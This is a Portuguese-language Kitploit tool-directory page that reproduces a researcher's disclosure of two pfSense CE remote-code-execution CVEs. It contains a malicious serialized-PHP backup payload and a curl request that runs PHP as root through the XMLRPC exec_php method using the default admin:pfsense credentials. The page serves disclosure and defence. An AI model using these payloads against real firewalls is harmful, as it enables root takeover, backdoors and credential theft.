Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/privlabs/cve-2025-69690-cve-2025-69691
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoPapers e PesquisaAprendizado e Educação
GitHubprivlabs/cve-2025-69690-cve-2025-69691

CVE-2025-69690-CVE-2025-69691

RCE autenticado no Netgate pfSense CE 2.7.2 e 2.8.0

Ver Repositório
6há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🔐 CVE-2025-69690 & CVE-2025-69691

Execução Remota de Código Autenticada no Netgate pfSense Community Edition

CVE CVE CVSS Vendor Status


📋 Resumo

CampoDetalhes
PesquisadorNelson Adhepeau (@privlabs)
FornecedorNetgate
ProdutopfSense Community Edition
Versões2.7.2 e 2.8.0
TipoExecução Remota de Código Autenticada
DivulgaçãoFevereiro de 2026
Fornecedor notificado2 de dezembro de 2025
CVE atribuído28 de janeiro de 2026

⚠️ Aviso Legal

Esta pesquisa foi conduzida em ambientes de laboratório isolados apenas para fins educacionais e de conscientização em segurança. Todas as descobertas foram divulgadas de forma responsável ao fornecedor antes da publicação. Este aviso não constitui um convite para atacar sistemas em produção. Testes não autorizados são ilegais.


🎯 CVE-2025-69690

Desserialização Insegura → RCE (pfSense CE 2.7.2)

CampoValor
CVSS v3.18.8 (Alto)
VetorAV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
CWECWE-502, CWE-915
Tipo de AtaqueAutenticado (Admin)
ComponenteMecanismo de Backup/Restauração

Descrição

O mecanismo de restauração de configuração do pfSense invoca unserialize() em dados controlados pelo usuário sem lista de permissão de classes, validação de entrada ou sandboxing.

Um arquivo de backup manipulado contendo um objeto PHP serializado malicioso injeta comandos arbitrários através da propriedade post_reboot_commands, que são executados via mwexec() com privilégios totais de root.

Fluxo do Ataque

[Atacante] → Login como admin
           → Envia arquivo de backup .xml malicioso
           → Aciona restauração
           → pfSense chama unserialize() nos dados do atacante
           → post_reboot_commands executado via mwexec()
           → [SHELL ROOT]

Componentes Afetados

  • config.php — lógica de processamento de restauração
  • pfsense_module_installer class — alvo de desserialização insegura
  • mwexec() — ponto de execução de comandos

Payload PoC

O:23:"pfsense_module_installer":1:{
  s:17:"*post_reboot_commands";
  a:1:{
    i:0;s:40:"/usr/local/bin/php -r 'system(\"id\");'";
  }
}

Impacto

  • ✅ Execução arbitrária de comandos do sistema operacional como root
  • ✅ Instalação de backdoor persistente
  • ✅ Tomada completa do firewall
  • ✅ Exfiltração de credenciais e configurações

Resposta do Fornecedor

"Reconhecido. Classificado como abuso administrativo autenticado. Nenhum patch será emitido." — Netgate


🎯 CVE-2025-69691

XMLRPC exec_php → RCE (pfSense CE 2.8.0)

CampoValor
CVSS v3.19.9 (Crítico)
VetorAV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CWECWE-284, CWE-915
Tipo de AtaqueAutenticado (remoto, Autenticação Básica)
ComponenteAPI XMLRPC — pfsense.exec_php

Descrição

O pfSense CE 2.8.0 expõe um método XMLRPC pfsense.exec_php que executa código PHP arbitrário como root sem validação, sandboxing ou qualquer forma de restrição.

O endpoint é:

  • ✅ Ativado por padrão
  • ✅ Acessível remotamente via HTTPS
  • ✅ Protegido apenas por Autenticação Básica
  • ✅ Explorável com credenciais padrão (admin:pfsense)

Fluxo do Ataque

[Atacante] → Envia requisição XMLRPC para /xmlrpc.php
           → Autentica com admin:pfsense (padrão)
           → Chama pfsense.exec_php com PHP arbitrário
           → Código é executado como root, sem sandboxing
           → [SHELL ROOT]

Componentes Afetados

  • xmlrpc.php — ponto de entrada da API
  • pfsense.exec_php — execução dinâmica de código insegura
  • Camada BasicAuth — controle de acesso insuficiente

PoC

curl -k -u admin:pfsense \
  -H "Content-Type: text/xml" \
  -d '<methodCall>
        <methodName>pfsense.exec_php</methodName>
        <params>
          <param>
            <value><string>system("id");</string></value>
          </param>
        </params>
      </methodCall>' \
  https://<target>/xmlrpc.php

Impacto

  • ✅ Comprometimento total remoto como root
  • ✅ Leitura/gravação arbitrária de arquivos
  • ✅ Implantação de backdoor
  • ✅ Manipulação de regras do firewall
  • ✅ Extração de todas as credenciais e configurações

Resposta do Fornecedor

"Reconhecido. Classificado como comportamento esperado para usuários autenticados. Nenhum patch planejado." — Netgate


📅 Linha do Tempo

Novembro de 2025   →  Vulnerabilidades descobertas
2 de dezembro de 2025  →  Divulgação responsável à Netgate
                    →  Fornecedor reconheceu, sem patch planejado
28 de janeiro de 2026 →  IDs CVE atribuídos pela MITRE
Fevereiro de 2026   →  Divulgação pública

🔗 Referências

  • 🔴 CVE-2025-69690 no cve.org
  • 🔴 CVE-2025-69691 no cve.org
  • 📧 Divulgação completa: [email protected]

👤 Pesquisador

Nelson Adhepeau — Pesquisador de Segurança Independente

LinkedIn GitHub

📧 [email protected]

Baixar ferramenta